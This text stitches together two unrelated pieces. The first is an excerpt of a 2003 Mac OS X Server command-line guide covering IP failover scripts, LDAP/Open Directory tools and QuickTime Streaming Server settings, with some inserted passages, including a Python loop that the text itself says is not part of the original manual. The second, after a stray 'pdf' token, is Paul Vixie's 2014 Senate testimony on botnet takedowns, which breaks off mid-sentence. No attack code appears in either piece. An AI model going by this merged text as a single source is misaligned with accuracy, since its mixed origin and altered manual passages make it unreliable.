LL2354.book Page 151 Monday, October 20, 2003 9:47 AM 152 Chapter 13 Working With Network Services Configuring IP Failover You configure failover behavior using scripts. The scripts must be executable (for example, shell scripts, Perl, compiled C code, or executable AppleScripts). You place these scripts in /Library/IPFailover/<IP address> on the secondary server. You need to create a directory named with the public IP address of the primary server to contain the failover scripts for that server. For example: /Library/IPFailover/100.0.0.10 Notification Only You can use a script named “Test” located in the failover scripts directory to control whether, in the event of a failover condition, the secondary server acquires the primary’s IP address, or simply sends an email notification. If no script exists, or if the script returns a zero result, then the secondary server acquires the primary’s IP address. If the script returns a non-zero result, then the secondary server skips IP address acquisition and only sends email notification of the failover condition. The test script is run to determine whether the IP address should be acquired and to determine if the IP address should be relinquished when the primary server returns to service. A simple way to set up this notification-only mode is to copy the script located at /usr/bin/false to the directory named with your primary server IP address and then change the name of the script to “Test”. This script always returns a non-zero result. Using the Test script, you can configure the primary server to monitor the secondary server, and send email notification if the secondary server becomes unavailable. Pre and Post Scripts You can configure the failover process with scripts that can run before acquiring the primary IP address (preacquisition), after acquiring the IP address (postacquisition), before relinquishing the primary IP address (prerelinquish), and after relinquishing the IP address back to the primary server (postrelinquish). These scripts reside in the /Library/IPFailover/<IP address> directory on the secondary server, as previously discussed. The scripts use these four prefixes: • PreAcq – run before acquiring IP address from primary server • PostAcq – run after acquiring IP address from primary server • PreRel – run before relinquishing IP address back to primary server • PostRel – run after relinquishing IP address back to primary server Important: Always be sure that the primary server is up and functioning normally before you activate IP failover on the secondary server. If the primary server isn’t sending broadcast messages, the secondary server will initiate the failover process and acquire the primary’s public IP address. You may have more than one script at each stage. The scripts in each prefix group are run in the order their file names appear in a directory listing using the ls command. LL2354.book Page 152 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 153 For example, your secondary server may perform other services on the network such as running a statistical analysis application and distributed image processing software. A preacquisition script quits the running applications to free up the CPU for the Web server. A postacquisition script starts the Web server. Once the primary is up and running again, a prerelinquish script quits the Web server, and a postrelinquish script starts the image processing and statistical analysis applications. 
The sequence of scripted events might look like this: <Failover condition detected> Test (if present) PreAcq10.StopDIP PreAcq20.StopSA PreAcq30.CleanupTmp <Acquire IP address> PostAcq10.StartTimer PostAcq20.StartApache <Primary server returns to service> PreRel10.StopApache PreRel20.StopTimer <Relinquish IP address> PostRel10.StartSA PostRel20.StartDIP PostRel30.MailTimerResultsToAdmin Enabling PPP Dial-In You can use the pppd command to set up Point-to-Point Protocol (PPP) dial-in service. For more information, see the man page. The “Examples” section of the man page shows an example of setting up dial-in service. LL2354.book Page 153 Monday, October 20, 2003 9:47 AM LL2354.book Page 154 Monday, October 20, 2003 9:47 AM 14 155 14 Working With Open Directory Commands you can use to manage the Open Directory service in Mac OS X Server. This chapter includes descriptions of general directory tools and tools for working with LDAP, NetInfo, and the Password Server. General Directory Tools Testing Your Open Directory Configuration You can use the dscl utility to test your directory services configuration. For more information, type man dscl to see the man page. Modifying an Open Directory Node You can also use the dscl utility to create, modify, or delete directory information in an Open Directory node. Testing Open Directory Plugins You can use the dsperfmonitor tool to check the performance of the protocol-specific plugins used by Open Directory. It can list the API calls being made to plugins, how long the plugins take to reply, and recent API call errors. For more information, type man dsperfmonitor to see the man page. Directory services API support is provided by the DirectoryService daemon. For more information, type man DirectoryService to see the man page. For information on the data types used by directory services, type man DirectoryServiceAttributes to see the man page. Finally, for information on the internals of Open Directory and its plugins, including source code you can examine or adopt, follow the Open Directory link at www.apple.com/darwin. LL2354.book Page 155 Monday, October 20, 2003 9:47 AM 156 Chapter 14 Working With Open Directory Registering URLs With Service Location Protocol (SLP) You can use the slp_reg command to register service URLs using the Service Location Protocol (SLP). For more information, type man slp_reg to see the man page. SLP registration is handled by the SLP daemon slpd. For more information, type man slpd to see the man page. Changing Open Directory Service Settings Use the following parameters with the serveradmin command to change settings for the Open Directory service. Be sure to add dirserv: to the beginning of any parameter you use. For example, to see the role that the server is playing in the directory hierarchy, you would type serveradmin settings dirserv:LDAPServerType. 
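Written out in the command form used elsewhere in this guide, that example looks like this:

$ sudo serveradmin settings dirserv:LDAPServerType

Settings in the following table are changed with the same serveradmin settings service:setting = value syntax described in the preceding chapters.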
Parameter (dirserv:) Description replicationUnits Default = "days" replicaLastUpdate Default = "" LDAPDataBasePath Default = "" replicationPeriod Default = 4 LDAPSearchBase Default = "" passwordOptionsString Default = "usingHistory=0 usingExpirationDate=0 usingHardExpirationDate=0 requiresAlpha=0 requiresNumeric=0 expirationDateGMT=12/31/69 hardExpireDateGMT=12/31/69 maxMinutesUntilChangePassword=0 maxMinutesUntilDisabled=0 maxMinutesOfNonUse=0 maxFailedLoginAttempts=0 minChars=0 maxChars=0 passwordCannotBeName=0" NetInfoRunStatus Default = "" LDAPSSLCertificatePath Default = "" masterServer Default = "" LDAPServerType Default = "standalone" NetInfoDomain Default = "" replicationWhen Default = "periodic" useSSL Default = "YES" LDAPDefaultPrefix Default = "dc=<domain>,dc=com" LDAPTimeoutUnits Default = "minutes" LDAPServerBackend Default = "BerkeleyDB" LL2354.book Page 156 Monday, October 20, 2003 9:47 AM Chapter 14 Working With Open Directory 157 LDAP Configuring LDAP The following tools are available for configuring LDAP. For more information, see the man page for each tool. slapconfig You can use the slapconfig utility to configure the slapd and slurpd LDAP daemons and related search policies. For more information, type man slapconfig to see the man page. Standard Distribution Tools These tools are included in the standard LDAP distribution. A Note on Using ldapsearch The ldapsearch tool connects to an LDAP server, binds to it, finds entries, and returns attributes of the entries found. By default, ldapsearch tries to connect to the LDAP server using the Simple Authentication and Security Layer (SASL) method. If the server doesn’t support this method, you see this error message: ldap_sasl_interactive_bind_s: No such attribute (16) To avoid this, include the -x option when you type the command. For example: ldapsearch -h 192.168.100.1 -b "dc=ecxample,dc=com" -x Program Used to /usr/bin/ldapadd Add entries to the LDAP directory. /usr/bin/ldapcompare Compare a directory entry’s actual attributes with known attributes. /usr/bin/ldapdelete Delete entries from the LDAP directory. /usr/bin/ldapmodify Change an entry’s attributes. /usr/bin/ldapmodrdn Change an entry’s relative distinguished name (RDN). /usr/bin/ldappasswd Set the password for an LDAP user. Apple recommends using passwd instead of ldappasswd. For more information, type man passwd. /usr/bin/ldapsearch Search the LDAP directory. See the usage note under “A Note on Using ldapsearch” on this page. /usr/bin/ldapwhoami Obtain the primary authorization identity associated with a user. /usr/sbin/slapadd Add entries to the LDAP directory. /usr/sbin/slapcat Export LDAP Directory Interchange Format files. /usr/sbin/slapindex Regenerate directory indexes. /usr/sbin/slappasswd Generate user password. hashes. LL2354.book Page 157 Monday, October 20, 2003 9:47 AM 158 Chapter 14 Working With Open Directory The -x option forces ldapsearch to use simple authentication instead of SASL. Idle Rebinding Options The following two LDAPv3 plugin parameters aren’t documented in the open directory administration guide. The parameters are in, or can be added to, the file /library/preferences/directoryservice/DSLDAPv3PlugInConfig.plist. Delay Rebind This parameter specifies how long the LDAP plugin waits before attempting to reconnect to a server that fails to respond. You can increase this value to prevent continuous reconnect attempts. 
<key>Delay Rebind Try in seconds<\key> <integer>n<\integer> You should find this parameter in the plist file near <key>OpenClose Timeout in seconds<\key>. If not, you can add it there. Idle Timeout This parameter specifies how long the LDAP plugin will sit idle before disconnecting from the server. You can adjust this value to reduce overloading of the server's connections from remote clients. <key>Idle Timeout in minutes<\key> <integer>n<\integer> If it doesn’t already exist in the plist file, you can add it near <key>OpenClose Timeout in seconds<\key>. Additional Information About LDAP The LDAP server in Mac OS X Server is based on OpenLDAP. Additional information about OpenLDAP, including an administrator’s guide, is available at www.openldap.org. LL2354.book Page 158 Monday, October 20, 2003 9:47 AM Chapter 14 Working With Open Directory 159 NetInfo Configuring NetInfo You can use the following command-line utilities to manage the NetInfo directory. For more information about a utility, see the related man page. For example, you can use the NeST -setprotocols command to specify which authentication methods the server’s Open Directory Password Server uses. Password Server Working With the Password Server You can use the mkpassdb utility to create, modify, or back up the password database used by the Mac OS X Server Password Server. For more information, type man mkpassdb to read the man page. Viewing or Changing Password Policies You can use the pwpolicy command to view or change the authentication policies used by the Mac OS X Server Password Server. For more information, type man pwpolicy to see the man page. Enabling or Disabling Authentication Methods All password authentication methods supported by Open Directory Password Server are initially enabled. You can disable and enable Open Directory Password Server authentication methods by using the NeST tool. To see a list of available methods: $ NeST -getprotocols To disable or enable a method: $ NeST -setprotocols protocol (on|off) Utility Used to NeST Configure the directory system of a server. nicl Create, view, and modify entries in the NetInfo directory. nifind Search the NetInfo directory for a particular entry. nigrep Search the NetInfo directory for an expression. nidump Export NetInfo data to text or flat files. niload Import flat files into the NetInfo directory. nireport Print tables of NetInfo directory entries. Parameter Description protocol Any of the protocol names listed by NeST -getprotocols (for example, SMB-LAN-MANAGER). LL2354.book Page 159 Monday, October 20, 2003 9:47 AM 160 Chapter 14 Working With Open Directory For information on the available methods, see the Open Directory administration guide. Kerberos and Single Sign On The following tools are available for setting up your Kerberos and Single Sign-On environment. For more information on a tool, see the related man page. Tool (in usr/sbin/) Description kdcsetup Creates necessary setup files and adds krb5kdc and kadmind servers for the Apple Open Directory KDC. sso_util Sets up, interrogates, and tears down the Kerberos configuration within the Apple Single Sign On environment. kerberosautoconfig Creates the edu.mit.Kerberos file based on the Open Directory KerberosClient record. LL2354.book Page 160 Monday, October 20, 2003 9:47 AM 15 161 15 Working With QuickTime Streaming Server Commands you can use to manage QTSS service in Mac OS X Server. 
Starting QTSS Service You can use the serveradmin command to start QTSS service, or you can use the quicktimestreamingserver command to specify additional service parameters when you start the service. To start QTSS service: $ sudo serveradmin start qtss or $ sudo quicktimestreamingserver To see a list of quicktimestreamingserver command options, type $ sudo quicktimestreamingserver -h Stopping QTSS Service To stop QTSS service: $ sudo serveradmin stop qtss Checking QTSS Service Status To see if QTSS service is running: $ sudo serveradmin status qtss To see complete QTSS status: $ sudo serveradmin fullstatus qtss LL2354.book Page 161 Monday, October 20, 2003 9:47 AM 162 Chapter 15 Working With QuickTime Streaming Server Viewing QTSS Settings To list all QTSS service settings: $ sudo serveradmin settings qtss To list a particular setting: $ sudo serveradmin settings qtss:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings qtss:modules:_array_id:QTSSAdminModule:* Changing QTSS Settings You can change QTSS service settings using the serveradmin command or by editing the QTSS parameter list file directly. To change a setting: $ sudo serveradmin settings qtss:setting = value To change several settings: $ sudo serveradmin settings qtss:setting = value qtss:setting = value qtss:setting = value [...] Control-D Parameter Description setting A QTSS service setting. To see a list of available settings, type $ sudo serveradmin settings qtss or see “QTSS Settings” on page 163. value An appropriate value for the setting. LL2354.book Page 162 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 163 QTSS Settings Use the following parameters with the serveradmin command to change settings for the QTSS service. Descriptions of Settings To see descriptions of most QTSS settings, you can look in the sample settings file /Library/QuickTimeStreaming/Config/streamingserver.xml-sample. Look for XML module and pref names that match the last two segments of the parameter name. For example, to see a description of modules:_array_id:QTSSFileModule:record_movie_file_sdp Look in the sample file for <MODULE NAME="QTSSFileModule">... <PREF NAME="record_movie_file_sdp". 
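One quick way to pull up such a description from the command line — a simple sketch using grep to print a few lines of trailing context after the match — is to search the sample file directly:

$ grep -A 5 'record_movie_file_sdp' /Library/QuickTimeStreaming/Config/streamingserver.xml-sample

Once you know which parameter you want, change it with the serveradmin settings syntax shown under "Changing QTSS Settings" above. For example (the value shown is purely illustrative), to raise the limit on simultaneous client connections listed below as server:maximum_connections:

$ sudo serveradmin settings qtss:server:maximum_connections = 2000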
QTSS parameters you might change: Parameter (qtss:) Description broadcaster:password Default = "" broadcaster:username Default = "" modules:_array_id:QTSSAccessLogModule: request_logfile_dir Default = "/Library/QuickTime Streaming/Logs/" modules:_array_id:QTSSAccessLogModule: request_logfile_interval Default = 7 modules:_array_id:QTSSAccessLogModule: request_logfile_name Default = "StreamingServer" modules:_array_id:QTSSAccessLogModule: request_logfile_size Default = 10240000 modules:_array_id:QTSSAccessLogModule: request_logging Default = yes modules:_array_id:QTSSAccessLogModule: request_logtime_in_gmt Default = yes modules:_array_id:QTSSAccessModule: modAccess_groupsfilepath Default = "/Library/Quick TimeStreaming/Config/ qtgroups" modules:_array_id:QTSSAccessModule: modAccess_qtaccessfilename Default = "qtaccess" modules:_array_id:QTSSAccessModule: modAccess_usersfilepath Default = "/Library/Quick TimeStreaming/Config/ qtusers" LL2354.book Page 163 Monday, October 20, 2003 9:47 AM 164 Chapter 15 Working With QuickTime Streaming Server modules:_array_id:QTSSAdminModule: AdministratorGroup Default = "admin" modules:_array_id:QTSSAdminModule: Authenticate Default = yes modules:_array_id:QTSSAdminModule: enable_remote_admin Default = yes modules:_array_id:QTSSAdminModule: IPAccessList Default = "127.0.0.*" modules:_array_id:QTSSAdminModule: LocalAccessOnly Default = yes modules:_array_id:QTSSFileModule: add_seconds_to_client_buffer_delay Default = 0 modules:_array_id:QTSSFileModule: admin_email Default = "" modules:_array_id:QTSSFileModule: record_movie_file_sdp Default = no modules:_array_id:QTSSHomeDirectoryModule: enabled Default = no modules:_array_id:QTSSHomeDirectoryModule: movies_directory Default = "/Sites/Streaming" modules:_array_id:QTSSMP3StreamingModule: mp3_broadcast_buffer_size Default = 8192 modules:_array_id:QTSSMP3StreamingModule: mp3_broadcast_password Default = "" modules:_array_id:QTSSMP3StreamingModule: mp3_max_flow_control_time Default = 10000 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_dir Default = "/Library/QuickTime Streaming/Logs/" modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_interval Default = 7 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_name Default = "mp3_access" modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_size Default = 10240000 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logging Default = yes modules:_array_id:QTSSMP3StreamingModule: mp3_request_logtime_in_gmt Default = yes modules:_array_id:QTSSMP3StreamingModule: mp3_streaming_enabled Default = yes Parameter (qtss:) Description LL2354.book Page 164 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 165 modules:_array_id:QTSSReflectorModule: allow_broadcasts Default = yes modules:_array_id:QTSSReflectorModule: allow_non_sdp_urls Default = yes modules:_array_id:QTSSReflectorModule: BroadcasterGroup Default = "broadcaster" modules:_array_id:QTSSReflectorModule: broadcast_dir_list Default = "" modules:_array_id:QTSSReflectorModule: disable_overbuffering Default = no modules:_array_id:QTSSReflectorModule: enable_broadcast_announce Default = yes modules:_array_id:QTSSReflectorModule: enable_broadcast_push Default = yes modules:_array_id:QTSSReflectorModule: ip_allow_list Default = "127.0.0.*" modules:_array_id:QTSSReflectorModule: kill_clients_when_broadcast_stops Default = no modules:_array_id:QTSSReflectorModule: minimum_static_sdp_port Default = 20000 modules:_array_id:QTSSReflectorModule: 
timeout_broadcaster_session_secs Default = 20 modules:_array_id:QTSSRelayModule: relay_prefs_file Default = "/Library/Quick TimeStreaming/Config/ relayconfig.xml" server:authentication_scheme Default = "digest" server:auto_restart Default = yes server:default_authorization_realm Default = "Streaming Server" server:do_report_http_connection_ip_address Default = no server:error_logfile_dir Default = "/Library/Quick TimeStreaming/Logs/" server:error_logfile_name Default = "Error" server:error_logfile_size Default = 256000 server:error_logfile_verbosity Default = 2 server:error_logging Default = yes server:force_logs_close_on_write Default = no server:maximum_bandwidth Default = 102400 server:maximum_connections Default = 1000 server:module_folder Default = "/Library/Quick TimeStreaming/Modules/" Parameter (qtss:) Description LL2354.book Page 165 Monday, October 20, 2003 9:47 AM 166 Chapter 15 Working With QuickTime Streaming Server QTSS serveradmin Commands You can use the following commands with the serveradmin application to manage QTSS service. Listing Current Connections You can use the serveradmin getConnectedUsers command to retrieve information about QTSS connections. To list connected users: $serveradmin command qtss:command = getConnectedUsers server:movie_folder Default = "/Library/Quick TimeStreaming/Movies/" server:pid_file Default = "/var/run/Quick TimeStreamingServer.pid" server:reliable_udp Default = yes server:reliable_udp_dirs Default = "/" server:run_group_name Default = "qtss" server:run_num_threads Default = 0 server:run_user_name Default = "qtss" web_admin:enabled Default = no web_admin:password Default = "" web_admin:username Default = "" Parameter (qtss:) Description Command (qtss:command=) Description getConnections List current QTSS connections. See “Listing Current Connections” on this page. getHistory View service statistics. See “Viewing QTSS Service Statistics” on page 167. getLogPaths Find the current location of the service logs. See “Viewing Service Logs” on page 168. LL2354.book Page 166 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 167 Viewing QTSS Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of connections and the data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command qtss:command = getHistory qtss:variant = statistic qtss:timeScale = scale Control-D Output qtss:nbSamples = <samples> qtss:samplesArray:_array_index:0:vn = <sample> qtss:samplesArray:_array_index:0:t = <time> qtss:samplesArray:_array_index:1:vn = <sample> qtss:samplesArray:_array_index:1:t = <time> [...] qtss:samplesArray:_array_index:i:vn = <sample> qtss:samplesArray:_array_index:i:t = <time> qtss:vnLegend = "<legend>" qtss:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of connected users (average during sampling period) v2 - throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify qtss:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "CONNECTIONS" for v1 "THROUGHPUT" for v2 <sample> The numerical value of the sample. For connections (v1), this is integer average number of connections. 
For throughput (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since January 1, 1970). Samples are taken every 60 seconds. Viewing Service Logs You can use tail or any other file listing tool to view the contents of the QTSS service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current QTSS error and activity logs are located. To display the log paths: $ sudo serveradmin command qtss:command = getLogPaths Output qtss:accessLog = <access-log> qtss:errorLog = <error-log> Value Description <access-log> The location of the QTSS service access log. Default = /Library/QuickTimeStreaming/Logs/StreamingServer.log <error-log> The location of the QTSS service error log. Default = /Library/QuickTimeStreaming/Logs/Error.log Forcing QTSS to Re-Read its Preferences You can force QTSS to re-read its preferences without restarting the server. You must log in as root to perform this task. To force QTSS to re-read its preferences: 1 List the QTSS processes: $ ps -ax | grep QuickTimeStreamingServer You should see a list similar to the following: 949 ?? Ss 0:00.00 /usr/sbin/QuickTimeStreamingServer 950 ?? S 0:00.13 /usr/sbin/QuickTimeStreamingServer 965 std S+ 0:00.00 grep QuickTimeStreamingServer 2 Find the larger of the two process IDs (PIDs) for the QuickTimeStreamingServer processes (in this case 950). 3 Send a HUP signal to this process: $ kill -HUP 950 Preparing Older Home Directories for User Streaming If you want to enable QTSS home directory streaming for home directories created using an earlier version of Mac OS X Server (before version 10.3), you need to set up the necessary streaming media folder in each user's home directory. You can use the createuserstreamingdir tool to set up the needed /Sites/Streaming folder. To set up /Sites/Streaming in older home directories: $ createuserstreamingdir user Parameter Description user The user in whose home directory the /Sites/Streaming folder is created.
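On a server with many existing accounts it is convenient to script the createuserstreamingdir call. The loop below is a sketch added for illustration, not part of the original manual; it assumes the tool is on the PATH and that you supply the list of short user names yourself, for example exported from Workgroup Manager into a file named users.txt.

import subprocess

def prepare_streaming_dirs(usernames):
    # Run the documented `createuserstreamingdir user` command once per account.
    for user in usernames:
        try:
            subprocess.run(["createuserstreamingdir", user], check=True)
            print(f"created /Sites/Streaming for {user}")
        except subprocess.CalledProcessError as err:
            print(f"failed for {user}: exit status {err.returncode}")

if __name__ == "__main__":
    # users.txt is assumed to contain one short user name per line.
    with open("users.txt") as fh:
        prepare_streaming_dirs(line.strip() for line in fh if line.strip())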
pdf
Testimony of Paul Vixie, Chairman & CEO Farsight Security, Inc. before the Subcommittee on Crime and Terrorism United States Senate Committee on the Judiciary Hearing on Taking Down Botnets: Public and Private Efforts to Disrupt and Dismantle Cybercriminal Networks July 15, 2014 I. INTRODUCTION Good afternoon Mr. Chairman, Ranking Member Graham, and Members of the Subcommittee. Thank you for inviting me to testify on the subject of botnet takedowns. My name is Paul Vixie, and I am the Chairman and Chief Executive Officer of Farsight Security, a commercial Internet security company. I am speaking today in my personal capacity based on a long history of building and securing Internet infrastructure. I am also here at the behest of the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), a non-profit Internet security association whose international membership is actively working to improve Internet security conditions worldwide. I have first-hand knowledge of these matters from my experience in the Internet industry since 1988. My background includes serving as the Chief Technology Officer for Abovenet/MFN, an Internet Service Provider (ISP); serving as the founder and CEO of MAPS, the first anti-spam company; and acting as the operator of the “F” DNS root name server. I have also been involved in Internet standards work in the Internet Engineering Task Force (IETF) and policy development work in the Internet Corporation for Assigned Names and Numbers (ICANN). In addition, I served for nine years on the board of trustees of ARIN, a company responsible for allocating Internet address resources in the United States, Canada, and parts of the Caribbean. I presently serve on the ICANN Security and Stability Committee (SSAC) and the ICANN Root Server System Advisory Committee (RSSAC). I am the author of several Internet standards related to the Internet Domain Name System (DNS) and was for eleven years the maintainer of BIND, a popular open source DNS software system. It was for my work on DNS and BIND that I was inducted earlier this year into the Internet Hall of Fame. My remarks today reflect my ongoing goal of fostering improvements in botnet takedown activities by the non- profit, for-profit, and law enforcement sectors. II. LESSONS FROM CONFICKER AND GHOST CLICK I would like to start by reviewing several successful botnet takedown efforts in recent years, since commonalities among these successes may prove instructive. In 2008 the Conficker worm was discovered and by mid-2009 there were over ten million infected computers participating in this botnet. I had a hands-on-keyboard role in operating the data collection and measurement infrastructure for the takedown team1, in which competing commercial security companies and Internet Service Providers – most being members of M3AAWG – cooperated with each other and with the academic research and law enforcement communities to mitigate this global threat.2 In 2011 the US Department of Justice led “Operation Ghost Click” in which a criminal gang headquartered in Estonia was arrested and charged with wire fraud, computer intrusion, and conspiracy. The “DNS Changer” botnet included at least 600,000 infected computers and the mitigation task was complicated by the need to keep all of these victims online while shutting off the criminal infrastructure the victims at this point depended on3. 
My employer, Internet Systems Consortium (ISC), was the court appointed receiver for the criminal’s Internet connectivity and resources, and I personally prepared, installed, and operated the replacement DNS servers necessary for this takedown. Each of these examples shows an ad-hoc public/private partnership in which trust was established and sensitive information including strategic planning was shared without any contractual framework. These takedowns were so-called “handshake deals” where personal credibility, not corporate or government heft, was the glue that held it together and made it work. And in each case the trust relationships we had formed as members of M3AAWG were key enablers for rapid and coherent reaction. Each of these takedowns is also an example of modern multilateralism in which intent, competence, and merit were the guiding lights. The importance of multilateralism cannot be overemphasized: We have found that when a single company or a single agency or nation “goes it alone” in a takedown action, the result has usually been catastrophe. The Internet is hugely interdependent and many rules governing its operation are unwritten. No amount of investment or planning can guarantee good results from a unilateral takedown action. Rather, takedown actors must work in concert and cooperation with a like-minded team representing many crafts and perspectives, in order to maximize benefit and minimize cost – and I refer specifically to the collateral costs borne by uninvolved bystanders. For example, Conficker’s second major version generated 50,000 (fifty thousand) domain names per day that had to be laboriously blocked or registered in order to keep the control of this botnet out of the hands of its criminal authors. Complicating the situation, these 50,000 domain names were split up across 110 different “country code” top-level domains that are each the property of a sovereign nation. The registries for these domains are a mix of private and public institutions, some with national government oversight and many without. Almost all of the 110 registries agreed to cooperate, which involved sharing technical plans and data, as well as strategic plans and calendars. Similarly, Operation Ghost Click required cooperation between United States and Estonian national law enforcement agencies, as well as competing national and multi- national ISPs and Internet security companies, and an eclectic collection of Internet researchers and adventurers. This diverse team worked together for a single common cause which was to protect the Internet’s end users and restore the Internet’s infrastructure after an extraordinary breach. Privacy deserves a special mention. In any takedown of criminal infrastructure, it is vital that end user privacy be protected according to the greatest common denominator of the laws or rules governing each participant in the coordinated takedown effort. So it was in Conficker, where victim event data that showed time stamps and unique IP addresses were only made available on a trusted, need-to-know basis. This information was only shared either with responsible scientists for studies conforming to international ethical guidelines for human subjects research, or with ISPs and anti-virus companies for the narrow and specific purpose of identifying and notifying victims with the end goals of cleanup and remediation. Privacy protections during Operation Ghost Click were even more rigorous. 
The court- appointed receiver who operated the replacement DNS servers deliberately gathered the minimum possible data about each victim, which included the IP address, time stamp, and port number – but no end-user DNS lookup names. Furthermore, the FBI and DOJ team members declared themselves unwilling to hold or even receive victim specific data, so the court-appointed receiver delivered the victim records directly to the researcher and clean-up teams, subject to non-disclosure terms. The ad-hoc nature of these public/private partnerships may seem like cause for concern, but I hope you will consider the following: First, this is how the Internet was built and how the Internet works; second, this is how criminals work with other criminals. We would not get far by trying to solve these fast-evolving global problems with top-down control or through government directives and rules. Bot-masters are constantly innovating, both by devising new ways to penetrate networks and new methods of avoiding detection. Effective response to, and remediation of, botnet attacks requires a coordinated effort that is flexible, nimble, and capable of quickly identifying and adapting to a dynamic and changing threat landscape. While government has a role to play in the takedown of criminal infrastructure such as botnets, it can be most effective by continuing to support the participation in ad-hoc public/private partnerships by agencies such as Justice (for example, see the FBI’s involvement in the National Cyber- Forensics and Training Alliance [NCFTA]) and Homeland Security (for example, see the United States Computer Emergency Readiness Team [US-CERT] and the SEI/CMU CERT). As another takeaway, I note that these two successful takedown exercises were both zero- fee events – no one was asked to “pay to play.” The shared goal of protecting Internet end users and restoring the Internet’s infrastructure requires a perfectly level playing field, and the only money which changed hands in Operation Ghost Click was a modest contract for technical services between the DOJ and the court-appointed receiver. III. EFFECTIVE ACTION REQUIRES UNDERSTANDING HOW BOTNETS ORIGINATE AND PROLIFERATE I’d like to take a moment to explain where botnets come from and what makes them so attractive to criminals and also what makes them possible. A botnet is literally a “network of robots,” where by “robot” we mean a computer that has been captured and made to run software neither provided by the computer’s maker nor authorized or installed by its owner. The Internet now reaches billions of end users, as well as tens of millions of unattended “servers” including alarming growing number of industrial control systems. Every Internet-connected device has some very complex software including an operating system, installed applications, and ephemeral “plugins.” The only hard and fast requirement for any of this software is “interoperability,” meaning, it merely has to work. From its humble academic origins in 1969 to the present planetary-scale digital fabric interconnecting most humans and facilitating almost all commerce, the Internet has seen continuous wildcat growth. As a platform for innovation, the Internet is unequaled in all of human history for the value it has created and the tools it has made available to every person in every nation. 
The level of freedom allowed to innovators on the Internet is unprecedented – pretty much any smart person or team can try out almost any idea, with a built-in global audience and perhaps an immediate global market as well. The invisible cost of this growth and innovative value creation is that much of the software we run on many of our connected devices was given wide exposure and perhaps forgotten by its maker without receiving “red team” testing to check for vulnerabilities. The challenge for the Internet is that today there is perhaps more assurance that a U.L. Listed toaster oven will not burn our house down than there is that some of our vastly more expensive and powerful Internet-connected devices are insulated from becoming a tool of online criminals. The economics of this situation also can be challenging, since in the fast-changing, high- growth Internet-enabled economy the winners are characterized by short time to market, low cost, and high volume. Innovators may not always have the time or resources to address potential security issues, so we live in a culture of “patching it later.” During the preparation of these remarks, I read news reports of an Internet-enabled light bulb, part of the “Internet of things,” that was found to be vulnerable to a simple attack in which it would expose the local wireless network password to anyone who asked. It is extremely unlikely that any of these flawed light bulbs can be patched or that their owners can or will be informed of the need to return the product for a refund or exchange. So while the world needs the Internet and the Internet’s powers of economic growth and innovation, the cost to the world is that many tens of millions of connected devices can easily and quite often do become tools for criminals. Some companies know this and are addressing it, but much work remains. But the pace of innovation and adaptation on the Internet is being matched by the pace of innovation and adaptation by criminal bot masters. After a software flaw leading to vulnerability is found and circulated, it is quickly exploited for criminal purposes. The first step is to use the flaw to install software used by criminals to manage the new computer as part of a botnet. Later steps will be to install specific software tools to facilitate various kinds of online crime like DDoS attacks, spamming, key logging, credential theft, or identity theft. The most important role of every member of a botnet is: find and infect more victims. Thus virtually all software flaws are exercised indirectly, using other infected computers. Criminals can operate their infrastructure through so many layers of proxies and middle-men that it’s almost impossible to trace most criminal acts back to their actors. As corollaries, it’s safe to say two things: (1) Most Internet crime could not exist without botnets; and (2) Botnets could not exist absent a never- ending series of software flaws in Internet connected devices. This is not a call for regulatory relief. The Internet’s success has come organically; that is, not just without a plan but precisely because there was no plan. No national government or super-national governance body could, or should try to, put this genie into a bottle. Rather, we must take stock of some long-invisible costs and make informed decisions as a nation and as a society on which of the Internet’s costs we should just live with versus which costs are high enough that we should seek out cheaper alternatives. 
The primary ways to lower these costs are no different than any non-Internet field: (1) Understand our situation; (2) Make our choices with eyes wide open; and (3) Invest or front-load wherever it will reduce costs in the long run. Finally, I’d like to quote an ICANN Security and Stability Advisory Committee (SSAC) report from 2002: With the advent of high speed "always on" connections, these PCs add up to either an enormous global threat, or a bonanza of freely retargetable resources, depending upon one's point of view.4 Regrettably, the major trend in the twelve years since that report was written is growth – more Internet connected devices, more software flaws, more botnets, and more crime. IV. STEPS FOR THE FUTURE Next, I’d like to describe what I think are some practical and effective next steps we can take toward some short and medium term goals. As you’ll see, I believe that we can get the most traction by going after the causes, enablers, and attractions of botnets, rather than just beefing up our ability to take down botnets. Awareness campaigns have played a notable role in slowing the spread of human diseases such as tuberculosis and HIV. Given the danger that an unpatched and undefended Internet connected device can pose to the world’s economy as well as to the privacy and safety of its owner and other humans, why would we do less to stop the spread of botnets? I hope to see the day when every user of the Internet knows that if their device is out of date and terribly slow, it is probably infected with malicious software that makes the device steal their identity, send spam, and participate in DDoS attacks. The US Government is one of the world’s largest buyers of Information Technology (IT). Any technical requirement that becomes part of the Federal Information Processing Standards (FIPS) stands a good chance of becoming a de-facto standard for the world. Since DDoS attacks often rely on the lack of Source Address Validation (SAV) by an ISP, perhaps we should investigate requiring SAV by date-certain for all ISPs and hosting or cloud service providers who wish to sell services to the US Government. Ensuring the security of critical infrastructure is a high priority for both government and industry. It may be useful to explore empaneling a blue ribbon committee to identify and recommend best practices for securing network and server architecture operating industrial control systems, especially as it relates to connected devices, connections between the hot side and the outside, and software testing and patching protocols for those systems. Some of the Conficker-infected computers we tracked in 2008 and 2009 turned out to be industrial controllers for medical equipment including in some cases human life/safety monitors used in surgical operating theatres. While there 